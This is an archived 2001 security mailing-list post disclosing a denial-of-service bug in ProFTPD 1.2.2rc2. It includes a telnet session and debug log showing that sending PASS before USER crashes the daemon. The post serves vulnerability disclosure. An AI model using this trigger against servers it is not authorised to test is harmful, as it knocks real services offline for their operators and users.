Vulnerability Development: ProFTPD 1.2.2rc2 DoS

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development mailing list archives

ProFTPD 1.2.2rc2 DoS

From: Daniel <daniel () sdf lonestar org>
Date: Sun, 3 Jun 2001 22:53:34 +0000 ( )


I've discovered that ProFTPD 1.2.2rc2 has a bug - each instance of the
daemon can be crashed remotely:
This happens when the PASS command is received before the USER command:
box:~# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.2.2rc2 Server (ProFTPD Default Installation) [box.xxx.com]
pass
Connection closed by foreign host.
box:~#
If you run proftpd -d 5, (debug mode, level 5) in the logs you see:
box.xxx.com (localhost[127.0.0.1]) - FTP session opened.
box.xxx.com (localhost[127.0.0.1]) - received: PASS (hidden)
box.xxx.com (localhost[127.0.0.1]) - ProFTPD terminating (signal 11)

 - Daniel Volozov

By Date By Thread

Current thread:

ProFTPD 1.2.2rc2 DoS Daniel (Jun 03)
- Re: ProFTPD 1.2.2rc2 DoS Daniel Roesen (Jun 03)
- Re: ProFTPD 1.2.2rc2 DoS Kurth Bemis (Jun 04)
- Odp: ProFTPD 1.2.2rc2 DoS ma (Jun 04)